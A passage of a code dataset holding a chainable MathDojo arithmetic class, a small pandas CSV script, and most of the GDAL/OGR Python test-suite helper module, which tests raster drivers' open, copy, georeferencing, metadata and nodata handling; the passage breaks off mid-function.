+{"seq_id":"252930218","text":"class MathDojo(object):\n    def __init__(self):\n        self.result = 0\n\n    def add(self, *args):\n        # add every argument to the running total and allow chaining\n        self.result += sum(args)\n        return self\n\n    def subtract(self, *args):\n        # subtract every argument from the running total and allow chaining\n        self.result -= sum(args)\n        return self\n\nmd = MathDojo()\nmd.add(0, 2)\nprint(md.result)\n\n\n#part 1\n# class MathDojo(object):\n#     def __init__(self):\n#         self.result = 0\n#     def add(self, *x):\n#         self.addThis = 0\n#         for value in x:\n#             self.addThis += value\n#         self.result += self.addThis\n#         return self\n#     def subtract(self, *y):\n#         self.subThis = 0\n#         for value in y:\n#             self.subThis += value\n#         self.result -= self.subThis\n#         return self\n# md = MathDojo().add(2).add(2,5).subtract(3,2).result\n#\n# print md\n","sub_path":"Python_OOP/MathDojo.py","file_name":"MathDojo.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"64769436","text":"import pandas\ntable=pandas.read_csv(\"mysample.csv\")\nprint(table)\n\ndata1={\n    'one':pandas.Series([1,2,3],index=['a','b','c']),\n    'two':pandas.Series([1,2,3,4], index=['a','b','c','d',])\n    }\ntables=pandas.DataFrame(data1)\ntables['three']=pandas.Series([10,20,30],index=['a','b','c'])\n\nrow=pandas.DataFrame([[11,13],[17,19]],columns=['one','three'])\ntables=tables.append(row)\ntables.to_csv(\"output.csv\")\n\n\ndata={'sample':pandas.Series([1,2,3,4],index=['a','b','c','d'])}\ntable=pandas.DataFrame(data)\nprint(table)\ntable.to_csv(\"data.csv\")","sub_path":"Module -4 NumKeyAndPandas/ReadinFileInPandas.py","file_name":"ReadinFileInPandas.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"161774314","text":"# -*- coding: utf-8 -*-\n###############################################################################\n# $Id$\n#\n# Project:  GDAL/OGR Test Suite\n# Purpose:  Python Library supporting GDAL/OGR Test Suite\n# Author:   Frank Warmerdam \n#\n###############################################################################\n# Copyright (c) 2003, Frank Warmerdam \n# Copyright (c) 2008-2013, Even Rouault \n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, 
modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n###############################################################################\n\nimport contextlib\nimport math\nimport os\nimport os.path\nimport stat\nimport sys\nfrom sys import version_info\nimport time\n\nfrom osgeo import gdal\nfrom osgeo import osr\nimport pytest\n\ncur_name = 'default'\n\nsuccess_counter = 0\nfailure_counter = 0\nexpected_failure_counter = 0\nblow_counter = 0\nskip_counter = 0\nfailure_summary = []\n\nreason = None\ncount_skipped_tests_download = 0\ncount_skipped_tests_slow = 0\nstart_time = None\nend_time = None\n\njp2kak_drv = None\njpeg2000_drv = None\njp2ecw_drv = None\njp2mrsid_drv = None\njp2openjpeg_drv = None\njp2lura_drv = None\njp2kak_drv_unregistered = False\njpeg2000_drv_unregistered = False\njp2ecw_drv_unregistered = False\njp2mrsid_drv_unregistered = False\njp2openjpeg_drv_unregistered = False\njp2lura_drv_unregistered = False\n\nif version_info >= (3, 0, 0):\n import gdaltest_python3 as gdaltestaux\nelse:\n import gdaltest_python2 as gdaltestaux\n\n# Process commandline arguments for stuff like --debug, --locale, --config\n\nargv = gdal.GeneralCmdLineProcessor(sys.argv)\n\n###############################################################################\n\n\ndef git_status():\n\n out, _ = runexternal_out_and_err('git status --porcelain .')\n return out\n\n\n###############################################################################\n\ndef get_lineno_2framesback(frames):\n try:\n import inspect\n frame = inspect.currentframe()\n while frames > 0:\n frame = frame.f_back\n frames = frames - 1\n\n return frame.f_lineno\n except ImportError:\n return -1\n\n###############################################################################\n\n\ndef post_reason(msg, frames=2):\n lineno = get_lineno_2framesback(frames)\n global reason\n\n if lineno >= 0:\n reason = 'line %d: %s' % (lineno, msg)\n else:\n reason = msg\n\n###############################################################################\n\n\ndef clean_tmp():\n all_files = os.listdir('tmp')\n for filename in all_files:\n if filename in ['CVS', 'do-not-remove']:\n continue\n\n try:\n os.remove('tmp/' + filename)\n except OSError:\n pass\n\n###############################################################################\n\n\ndef testCreateCopyInterruptCallback(pct, message, user_data):\n # pylint: disable=unused-argument\n return pct <= 0.5\n\n###############################################################################\n\n\nclass GDALTest(object):\n def __init__(self, drivername, filename, band, chksum,\n xoff=0, yoff=0, xsize=0, ysize=0, options=None,\n filename_absolute=0, chksum_after_reopening=None, open_options=None):\n self.driver = None\n self.drivername = drivername\n self.filename = 
filename\n self.filename_absolute = filename_absolute\n self.band = band\n self.chksum = chksum\n if chksum_after_reopening is not None:\n if isinstance(chksum_after_reopening, list):\n self.chksum_after_reopening = chksum_after_reopening\n else:\n self.chksum_after_reopening = [chksum_after_reopening]\n elif chksum is None:\n self.chksum_after_reopening = None\n else:\n self.chksum_after_reopening = [chksum]\n self.xoff = xoff\n self.yoff = yoff\n self.xsize = xsize\n self.ysize = ysize\n self.options = [] if options is None else options\n self.open_options = open_options\n\n def testDriver(self):\n if self.driver is None:\n self.driver = gdal.GetDriverByName(self.drivername)\n if self.driver is None:\n pytest.skip(self.drivername + ' driver not found!')\n\n def testOpen(self, check_prj=None, check_gt=None, gt_epsilon=None,\n check_stat=None, check_approx_stat=None,\n stat_epsilon=None, skip_checksum=None, check_min=None,\n check_max=None, check_filelist=True):\n \"\"\"check_prj - projection reference, check_gt - geotransformation\n matrix (tuple), gt_epsilon - geotransformation tolerance,\n check_stat - band statistics (tuple), stat_epsilon - statistics\n tolerance.\"\"\"\n self.testDriver()\n\n if self.filename_absolute:\n wrk_filename = self.filename\n else:\n wrk_filename = 'data/' + self.filename\n\n if self.open_options:\n ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n assert ds is not None, ('Failed to open dataset: ' + wrk_filename)\n\n assert ds.GetDriver().ShortName == gdal.GetDriverByName(self.drivername).ShortName, \\\n ('The driver of the returned dataset is %s instead of %s.' % (ds.GetDriver().ShortName, self.drivername))\n\n if self.xsize == 0 and self.ysize == 0:\n self.xsize = ds.RasterXSize\n self.ysize = ds.RasterYSize\n\n if check_filelist and ds.GetDriver().GetMetadataItem('DCAP_VIRTUALIO') is not None:\n fl = ds.GetFileList()\n if fl is not None and fl and wrk_filename == fl[0]:\n\n # Copy all files in /vsimem/\n mainfile_dirname = os.path.dirname(fl[0])\n for filename in fl:\n target_filename = '/vsimem/tmp_testOpen/' + filename[len(mainfile_dirname) + 1:]\n if stat.S_ISDIR(gdal.VSIStatL(filename).mode):\n gdal.Mkdir(target_filename, 0)\n else:\n f = gdal.VSIFOpenL(filename, 'rb')\n assert f is not None, ('File %s does not exist' % filename)\n gdal.VSIFSeekL(f, 0, 2)\n size = gdal.VSIFTellL(f)\n gdal.VSIFSeekL(f, 0, 0)\n data = gdal.VSIFReadL(1, size, f)\n gdal.VSIFCloseL(f)\n if data is None:\n data = ''\n gdal.FileFromMemBuffer(target_filename, data)\n\n # Try to open the in-memory file\n main_virtual_filename = '/vsimem/tmp_testOpen/' + os.path.basename(fl[0])\n virtual_ds = gdal.Open(main_virtual_filename)\n virtual_ds_is_None = virtual_ds is None\n virtual_ds = None\n\n # Make sure the driver is specific enough by trying to open\n # with all other drivers but it\n drivers = []\n for i in range(gdal.GetDriverCount()):\n drv_name = gdal.GetDriver(i).ShortName\n if drv_name.lower() != self.drivername.lower() and not \\\n ((drv_name.lower() == 'gif' and self.drivername.lower() == 'biggif') or\n (drv_name.lower() == 'biggif' and self.drivername.lower() == 'gif')):\n drivers += [drv_name]\n other_ds = gdal.OpenEx(main_virtual_filename, gdal.OF_RASTER, allowed_drivers=drivers)\n other_ds_is_None = other_ds is None\n other_ds_driver_name = None\n if not other_ds_is_None:\n other_ds_driver_name = other_ds.GetDriver().ShortName\n other_ds = None\n\n for filename in 
gdal.ReadDirRecursive('/vsimem/tmp_testOpen'):\n gdal.Unlink('/vsimem/tmp_testOpen/' + filename)\n\n assert not virtual_ds_is_None, \\\n 'File list is not complete or driver does not support /vsimem/'\n assert other_ds_is_None, \\\n ('When excluding %s, dataset is still opened by driver %s' % (self.drivername, other_ds_driver_name))\n\n # Do we need to check projection?\n if check_prj is not None:\n new_prj = ds.GetProjection()\n\n src_osr = osr.SpatialReference()\n src_osr.SetFromUserInput(check_prj)\n\n new_osr = osr.SpatialReference(wkt=new_prj)\n\n if not src_osr.IsSame(new_osr):\n print('')\n print('old = %s' % src_osr.ExportToPrettyWkt())\n print('new = %s' % new_osr.ExportToPrettyWkt())\n pytest.fail('Projections differ')\n\n # Do we need to check geotransform?\n if check_gt:\n # Default to 100th of pixel as our test value.\n if gt_epsilon is None:\n gt_epsilon = (abs(check_gt[1]) + abs(check_gt[2])) / 100.0\n\n new_gt = ds.GetGeoTransform()\n for i in range(6):\n if abs(new_gt[i] - check_gt[i]) > gt_epsilon:\n print('')\n print('old = ', check_gt)\n print('new = ', new_gt)\n pytest.fail('Geotransform differs.')\n\n oBand = ds.GetRasterBand(self.band)\n if skip_checksum is None:\n chksum = oBand.Checksum(self.xoff, self.yoff, self.xsize, self.ysize)\n\n # Do we need to check approximate statistics?\n if check_approx_stat:\n # Default to 1000th of pixel value range as our test value.\n if stat_epsilon is None:\n stat_epsilon = \\\n abs(check_approx_stat[1] - check_approx_stat[0]) / 1000.0\n\n new_stat = oBand.GetStatistics(1, 1)\n for i in range(4):\n\n # NOTE - mloskot: Poor man Nan/Inf value check. It's poor\n # because we need to support old and buggy Python 2.3.\n # Tested on Linux, Mac OS X and Windows, with Python 2.3/2.4/2.5.\n sv = str(new_stat[i]).lower()\n assert not ('n' in sv or 'i' in sv or '#' in sv), \\\n ('NaN or infinity value encountered \\'%s\\'.' % sv)\n\n if abs(new_stat[i] - check_approx_stat[i]) > stat_epsilon:\n print('')\n print('old = ', check_approx_stat)\n print('new = ', new_stat)\n pytest.fail('Approximate statistics differs.')\n\n # Do we need to check statistics?\n if check_stat:\n # Default to 1000th of pixel value range as our test value.\n if stat_epsilon is None:\n stat_epsilon = abs(check_stat[1] - check_stat[0]) / 1000.0\n\n # FIXME: how to test approximate statistic results?\n new_stat = oBand.GetStatistics(1, 1)\n\n new_stat = oBand.GetStatistics(0, 1)\n for i in range(4):\n\n sv = str(new_stat[i]).lower()\n assert not ('n' in sv or 'i' in sv or '#' in sv), \\\n ('NaN or infinity value encountered \\'%s\\'.' 
% sv)\n\n if abs(new_stat[i] - check_stat[i]) > stat_epsilon:\n print('')\n print('old = ', check_stat)\n print('new = ', new_stat)\n pytest.fail('Statistics differs.')\n\n if check_min:\n assert oBand.GetMinimum() == check_min, \\\n ('Unexpected minimum value %s' % str(oBand.GetMinimum()))\n\n if check_max:\n assert oBand.GetMaximum() == check_max, \\\n ('Unexpected maximum value %s' % str(oBand.GetMaximum()))\n\n ds = None\n\n assert not is_file_open(wrk_filename), 'file still open after dataset closing'\n\n if skip_checksum is not None:\n return\n if self.chksum is None or chksum == self.chksum:\n return\n pytest.fail('Checksum for band %d in \"%s\" is %d, but expected %d.'\n % (self.band, self.filename, chksum, self.chksum))\n\n def testCreateCopy(self, check_minmax=1, check_gt=0, check_srs=None,\n vsimem=0, new_filename=None, strict_in=0,\n skip_preclose_test=0, delete_copy=1, gt_epsilon=None,\n check_checksum_not_null=None, interrupt_during_copy=False,\n dest_open_options=None, quiet_error_handler=True):\n\n self.testDriver()\n\n if self.filename_absolute:\n wrk_filename = self.filename\n else:\n wrk_filename = 'data/' + self.filename\n\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n if self.band > 0:\n minmax = src_ds.GetRasterBand(self.band).ComputeRasterMinMax()\n\n src_prj = src_ds.GetProjection()\n src_gt = src_ds.GetGeoTransform()\n\n if new_filename is None:\n if vsimem:\n new_filename = '/vsimem/' + os.path.basename(self.filename) + '.tst'\n else:\n new_filename = 'tmp/' + os.path.basename(self.filename) + '.tst'\n\n if quiet_error_handler:\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n if interrupt_during_copy:\n new_ds = self.driver.CreateCopy(new_filename, src_ds,\n strict=strict_in,\n options=self.options,\n callback=testCreateCopyInterruptCallback)\n else:\n new_ds = self.driver.CreateCopy(new_filename, src_ds,\n strict=strict_in,\n options=self.options)\n if quiet_error_handler:\n gdal.PopErrorHandler()\n\n if interrupt_during_copy:\n if new_ds is None:\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n self.driver.Delete(new_filename)\n gdal.PopErrorHandler()\n return\n new_ds = None\n self.driver.Delete(new_filename)\n pytest.fail('CreateCopy() should have failed due to interruption')\n\n assert new_ds is not None, ('Failed to create test file using CreateCopy method.' +\n '\\n' + gdal.GetLastErrorMsg())\n\n assert new_ds.GetDriver().ShortName == gdal.GetDriverByName(self.drivername).ShortName, \\\n ('The driver of the returned dataset is %s instead of %s.' % (new_ds.GetDriver().ShortName, self.drivername))\n\n if self.band > 0 and skip_preclose_test == 0:\n bnd = new_ds.GetRasterBand(self.band)\n if check_checksum_not_null is True:\n assert bnd.Checksum() != 0, 'Got null checksum on still-open file.'\n elif self.chksum is not None and bnd.Checksum() != self.chksum:\n pytest.fail(\n 'Did not get expected checksum on still-open file.\\n'\n ' Got %d instead of %d.' 
% (bnd.Checksum(), self.chksum))\n if check_minmax:\n got_minmax = bnd.ComputeRasterMinMax()\n assert got_minmax == minmax, \\\n ('Did not get expected min/max values on still-open file.\\n'\n ' Got %g,%g instead of %g,%g.'\n % (got_minmax[0], got_minmax[1], minmax[0], minmax[1]))\n\n bnd = None\n new_ds = None\n\n # hopefully it's closed now!\n\n if dest_open_options is not None:\n new_ds = gdal.OpenEx(new_filename, gdal.OF_RASTER, open_options=dest_open_options)\n else:\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n if self.band > 0:\n bnd = new_ds.GetRasterBand(self.band)\n if check_checksum_not_null is True:\n assert bnd.Checksum() != 0, 'Got null checksum on reopened file.'\n elif self.chksum_after_reopening is not None and bnd.Checksum() not in self.chksum_after_reopening:\n pytest.fail('Did not get expected checksum on reopened file.\\n'\n ' Got %d instead of %s.'\n % (bnd.Checksum(), str(self.chksum_after_reopening)))\n\n if check_minmax:\n got_minmax = bnd.ComputeRasterMinMax()\n assert got_minmax == minmax, \\\n ('Did not get expected min/max values on reopened file.\\n'\n ' Got %g,%g instead of %g,%g.'\n % (got_minmax[0], got_minmax[1], minmax[0], minmax[1]))\n\n # Do we need to check the geotransform?\n if check_gt:\n if gt_epsilon is None:\n eps = 0.00000001\n else:\n eps = gt_epsilon\n new_gt = new_ds.GetGeoTransform()\n if abs(new_gt[0] - src_gt[0]) > eps \\\n or abs(new_gt[1] - src_gt[1]) > eps \\\n or abs(new_gt[2] - src_gt[2]) > eps \\\n or abs(new_gt[3] - src_gt[3]) > eps \\\n or abs(new_gt[4] - src_gt[4]) > eps \\\n or abs(new_gt[5] - src_gt[5]) > eps:\n print('')\n print('old = ', src_gt)\n print('new = ', new_gt)\n pytest.fail('Geotransform differs.')\n\n # Do we need to check the geotransform?\n if check_srs is not None:\n new_prj = new_ds.GetProjection()\n\n src_osr = osr.SpatialReference(wkt=src_prj)\n new_osr = osr.SpatialReference(wkt=new_prj)\n\n if not src_osr.IsSame(new_osr):\n print('')\n print('old = %s' % src_osr.ExportToPrettyWkt())\n print('new = %s' % new_osr.ExportToPrettyWkt())\n pytest.fail('Projections differ')\n\n bnd = None\n new_ds = None\n src_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON' and delete_copy == 1:\n self.driver.Delete(new_filename)\n\n def testCreate(self, vsimem=0, new_filename=None, out_bands=1,\n check_minmax=1, dest_open_options=None):\n self.testDriver()\n\n if self.filename_absolute:\n wrk_filename = self.filename\n else:\n wrk_filename = 'data/' + self.filename\n\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n src_img = src_ds.GetRasterBand(self.band).ReadRaster(0, 0, xsize, ysize)\n minmax = src_ds.GetRasterBand(self.band).ComputeRasterMinMax()\n\n if new_filename is None:\n if vsimem:\n new_filename = '/vsimem/' + self.filename + '.tst'\n else:\n new_filename = 'tmp/' + self.filename + '.tst'\n\n new_ds = self.driver.Create(new_filename, xsize, ysize, out_bands,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n src_ds = None\n\n try:\n for band in range(1, out_bands + 1):\n new_ds.GetRasterBand(band).WriteRaster(0, 0, xsize, ysize, src_img)\n except:\n pytest.fail('Failed to write raster bands to test file.')\n\n for band in range(1, out_bands + 1):\n assert 
self.chksum is None or new_ds.GetRasterBand(band).Checksum() == self.chksum, \\\n ('Did not get expected checksum on still-open file.\\n'\n ' Got %d instead of %d.'\n % (new_ds.GetRasterBand(band).Checksum(), self.chksum))\n\n computed_minmax = new_ds.GetRasterBand(band).ComputeRasterMinMax()\n if computed_minmax != minmax and check_minmax:\n print('expect: ', minmax)\n print('got: ', computed_minmax)\n pytest.fail('Did not get expected min/max values on still-open file.')\n\n new_ds = None\n\n if dest_open_options is not None:\n new_ds = gdal.OpenEx(new_filename, gdal.OF_RASTER, open_options=dest_open_options)\n else:\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n for band in range(1, out_bands + 1):\n assert self.chksum is None or new_ds.GetRasterBand(band).Checksum() == self.chksum, \\\n ('Did not get expected checksum on reopened file.'\n ' Got %d instead of %d.'\n % (new_ds.GetRasterBand(band).Checksum(), self.chksum))\n\n assert new_ds.GetRasterBand(band).ComputeRasterMinMax() == minmax or not check_minmax, \\\n 'Did not get expected min/max values on reopened file.'\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetGeoTransform(self):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n gt = (123.0, 1.18, 0.0, 456.0, 0.0, -1.18)\n assert new_ds.SetGeoTransform(gt) is gdal.CE_None, \\\n 'Failed to set geographic transformation.'\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n eps = 0.00000001\n new_gt = new_ds.GetGeoTransform()\n if abs(new_gt[0] - gt[0]) > eps \\\n or abs(new_gt[1] - gt[1]) > eps \\\n or abs(new_gt[2] - gt[2]) > eps \\\n or abs(new_gt[3] - gt[3]) > eps \\\n or abs(new_gt[4] - gt[4]) > eps \\\n or abs(new_gt[5] - gt[5]) > eps:\n print('')\n print('old = ', gt)\n print('new = ', new_gt)\n pytest.fail('Did not get expected geotransform.')\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetProjection(self, prj=None, expected_prj=None):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n gt = (123.0, 1.18, 0.0, 456.0, 0.0, -1.18)\n if prj is None:\n # This is a challenging SRS since it has non-meter linear units.\n prj = 'PROJCS[\"NAD83 / Ohio South\",GEOGCS[\"NAD83\",DATUM[\"North_American_Datum_1983\",SPHEROID[\"GRS 
1980\",6378137,298.257222101,AUTHORITY[\"EPSG\",\"7019\"]],AUTHORITY[\"EPSG\",\"6269\"]],PRIMEM[\"Greenwich\",0,AUTHORITY[\"EPSG\",\"8901\"]],UNIT[\"degree\",0.01745329251994328,AUTHORITY[\"EPSG\",\"9122\"]],AUTHORITY[\"EPSG\",\"4269\"]],PROJECTION[\"Lambert_Conformal_Conic_2SP\"],PARAMETER[\"standard_parallel_1\",40.03333333333333],PARAMETER[\"standard_parallel_2\",38.73333333333333],PARAMETER[\"latitude_of_origin\",38],PARAMETER[\"central_meridian\",-82.5],PARAMETER[\"false_easting\",1968500],PARAMETER[\"false_northing\",0],UNIT[\"US survey foot\",0.3048006096012192]]'\n\n src_osr = osr.SpatialReference()\n src_osr.ImportFromWkt(prj)\n\n new_ds.SetGeoTransform(gt)\n assert new_ds.SetProjection(prj) is gdal.CE_None, \\\n 'Failed to set geographic projection string.'\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n expected_osr = osr.SpatialReference()\n if expected_prj is None:\n expected_osr = src_osr\n else:\n expected_osr.ImportFromWkt(expected_prj)\n\n new_osr = osr.SpatialReference()\n new_osr.ImportFromWkt(new_ds.GetProjection())\n if not new_osr.IsSame(expected_osr):\n print('Got: ')\n print(new_osr.ExportToPrettyWkt())\n print('Expected:')\n print(expected_osr.ExportToPrettyWkt())\n pytest.fail('Did not get expected projection reference.')\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetMetadata(self):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n new_ds.SetMetadata({'TEST_KEY': 'TestValue'})\n # FIXME\n # if new_ds.SetMetadata( dict ) is not gdal.CE_None:\n # print new_ds.SetMetadata( dict )\n # post_reason( 'Failed to set metadata item.' 
)\n # return 'fail'\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n md_dict = new_ds.GetMetadata()\n\n assert 'TEST_KEY' in md_dict, 'Metadata item TEST_KEY does not exist.'\n\n assert md_dict['TEST_KEY'] == 'TestValue', 'Did not get expected metadata item.'\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetNoDataValue(self, delete=False):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n if self.options is None or 'PIXELTYPE=SIGNEDBYTE' not in self.options:\n nodata = 130\n else:\n nodata = 11\n assert new_ds.GetRasterBand(1).SetNoDataValue(nodata) is gdal.CE_None, \\\n 'Failed to set NoData value.'\n\n src_ds = None\n new_ds = None\n\n if delete:\n mode = gdal.GA_Update\n else:\n mode = gdal.GA_ReadOnly\n new_ds = gdal.Open(new_filename, mode)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n assert nodata == new_ds.GetRasterBand(1).GetNoDataValue(), \\\n 'Did not get expected NoData value.'\n\n if delete:\n assert new_ds.GetRasterBand(1).DeleteNoDataValue() == 0, \\\n 'Did not manage to delete nodata value'\n\n new_ds = None\n\n if delete:\n new_ds = gdal.Open(new_filename)\n assert new_ds.GetRasterBand(1).GetNoDataValue() is None, \\\n 'Got nodata value whereas none was expected'\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetNoDataValueAndDelete(self):\n return self.testSetNoDataValue(delete=True)\n\n def testSetDescription(self):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n description = \"Description test string\"\n new_ds.GetRasterBand(1).SetDescription(description)\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n assert description == new_ds.GetRasterBand(1).GetDescription(), \\\n 'Did not get expected description string.'\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetUnitType(self):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = 
self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n unit = 'mg/m3'\n assert new_ds.GetRasterBand(1).SetUnitType(unit) is gdal.CE_None, \\\n 'Failed to set unit type.'\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n new_unit = new_ds.GetRasterBand(1).GetUnitType()\n if new_unit != unit:\n print('')\n print('old = ', unit)\n print('new = ', new_unit)\n pytest.fail('Did not get expected unit type.')\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n\ndef approx_equal(a, b):\n a = float(a)\n b = float(b)\n if a == 0 and b != 0:\n return 0\n\n if abs(b / a - 1.0) > .00000000001:\n return 0\n return 1\n\n\ndef user_srs_to_wkt(user_text):\n srs = osr.SpatialReference()\n srs.SetFromUserInput(user_text)\n return srs.ExportToWkt()\n\n\ndef equal_srs_from_wkt(expected_wkt, got_wkt):\n expected_srs = osr.SpatialReference()\n expected_srs.ImportFromWkt(expected_wkt)\n\n got_srs = osr.SpatialReference()\n got_srs.ImportFromWkt(got_wkt)\n\n if got_srs.IsSame(expected_srs):\n return 1\n print('Expected:\\n%s' % expected_wkt)\n print('Got: \\n%s' % got_wkt)\n\n post_reason('SRS differs from expected.')\n return 0\n\n###############################################################################\n# Compare two sets of RPC metadata, and establish if they are essentially\n# equivalent or not.\n\n\ndef rpcs_equal(md1, md2):\n\n simple_fields = ['LINE_OFF', 'SAMP_OFF', 'LAT_OFF', 'LONG_OFF',\n 'HEIGHT_OFF', 'LINE_SCALE', 'SAMP_SCALE', 'LAT_SCALE',\n 'LONG_SCALE', 'HEIGHT_SCALE']\n coef_fields = ['LINE_NUM_COEFF', 'LINE_DEN_COEFF',\n 'SAMP_NUM_COEFF', 'SAMP_DEN_COEFF']\n\n for sf in simple_fields:\n\n try:\n if not approx_equal(float(md1[sf]), float(md2[sf])):\n post_reason('%s values differ.' % sf)\n print(md1[sf])\n print(md2[sf])\n return 0\n except:\n post_reason('%s value missing or 